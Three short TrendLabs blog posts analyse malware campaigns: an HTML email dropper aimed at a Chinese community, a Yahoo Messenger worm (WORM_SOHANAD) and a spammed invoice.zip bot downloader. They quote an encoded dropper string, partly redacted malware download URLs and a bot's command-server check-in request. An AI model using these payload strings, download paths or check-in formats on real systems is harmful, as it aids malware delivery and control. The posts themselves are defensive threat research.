TrendLabs received reports of malicious files that is being distributed via email to a target audience, particularly a small Chinese Internet community. According to SANS Internet Storm Center, the email message is written in Chinese.

“Clicking on the attachment does not actually do anything?? while it contains some dropper code, it appears to have been corrupted, or does not load correctly on our UK English test systems.”

Read more about the article here.

The attached file content.html opens and closes script tags immediately. Within the HTML body, it opens a Microsoft Spreadsheet object. The rest of the file is a Microsoft Word document in XML format. The following string also appears just in front of the Office document:

%u7468%u7074%u2F3A%u372F%u2E30%u3538%u322E%u2E35%u3731%u3A34%u3733%u3132%u312F%u652E%u6578

This translates into http://70.{BLOCKED}.174:3721/1.exe when decoded. Trend Micro detects the said HTML file as JS_AGENT.AAAA.

The executable file 1.exe, which is downloaded into the system as GALAI.EXE, is packed using BeRo. Trend Micro detects this as TROJ_DLOADER.UAM. Once executed, it opens an Internet browser window and plays the following YouTube video:

http://www.youtube.com/{BLOCKED}?v=3h_kU7-B2vI

This video apparently shows clips related to the Chinese New Year. While this video is playing, it issues a DNS query for thechina.512j.com in the background. This currently resolves to an IP address that is hosted at a certain Chinese internet cafe. From there, it attempts to retrieve a file msss.exe. However, this file is no longer available from the download site.

Although this malware is targeted to a select community, users are warned of the said email and are advised not to click on links within email messages, even if they seem to have come from a trusted source.

Data provided by Maarten Van Horenbeeck of SANS Internet Storm Center. Additional information provided by Trend Senior Threat Researcher Ivan Macalintal.

Today, Senior Anti-Threat Researcher Loucif Kharouni reported of a Yahoo Messenger (YM) message that is currently spreading in the wild. It is written in English and contains a link to some pictures of the Iraq war. The link was found to be malicious. Here is a screenshot of what is being received:



Copy-pasting the link into an Internet Explorer browser opens the following Web site:



When the Web site is accessed, the link becomes completely different. This is because once you try to access the picture, it redirects you to a malicious Web site, http://72.{BLOCKED}.170/~plobble/smail/lists/etc/index.php.



Once this happens, the malicious routine starts. It modifies your YM status into a message containing a malicious link. It also sends out the following messages and malicious links to each of your YM contacts:



Once installed and running on your system, it drops worm files and their components, creates processes, and prevents your system from running antivirus and security programs. Trend Micro detects the dropped files as WORM_SOHANAD.DC and WORM_SOHANAD.DJ. It also drops a copy of itself in the Windows startup folder so that it can run every time Windows restarts. It accesses the following Web sites, probably to download more malicious files:

• http://72.{BLOCKED}.170/~plobble/smail/lists/etc/worm2007.exe
  
• http://72.{BLOCKED}.170/~plobble/smail/lists/etc/worm2007.exe
  
• http://72.{BLOCKED}.170/~plobble/smail/lists/etc/YMworm.exe
  

As shown in the network capture of the infection below, you can see the request to download the file YMworm.exe (WORM_SOHANAD.DC) from the malicious Web site:



Users are advised to be wary of the said IM messages and not to click on links sent via YM, even if it comes from somone you know. Chances are, you might be already downloading WORM_SOHANAD into your computers.

Data provided by Loucif Kharouni, Senior Anti-Threat Researcher (Trend Micro EMEA)

There’s a new malware being spammed right now. It has the attachment invoice.zip, which contains two files:

• cancel order.exe (md5: 2c51d2f9188464763fc664beedb314ff, size: 3837 bytes)
• invoice.html

In case the user did not double-click the EXE attachment, there’s a backup plan. The file invoice.html is a short HTML file which attempts to social engineer the user into executing cancel order.exe, by posing as a purchase receipt.

The “click here” link will point you to the cancel order.exe executable. But this plan miserably fails if your archiver did not extract the cancel order.exe from the invoice.zip file.

No anti-malware firm detects cancel order.exe yet, with the exception of Trend Micro, which detects the critter as PAK_Generic.001.

The malware downloads the following file

http://www.[BLOCKED]/webdl4x/webbot.exe

AV coverage is also low, but Trend also detects this one as PAK_Generic.001.

And it seems that our new find is also a bot, as evidenced by this web request.

http://[BLOCKED].info/settings/webbot/remote.php?os=XP&user=sp1-1&status=1&version=0.1& build=beta003&uptime=0w%203d%200h%202m%2052s%20&av=&fw=

As can be seen, it reports the system’s OS, machine name, uptime, AV, and firewall. And the server promptly replies with:

Added Successfully!

More updates later…

Cheers to Trend Researcher Joey Costoya for discovering this!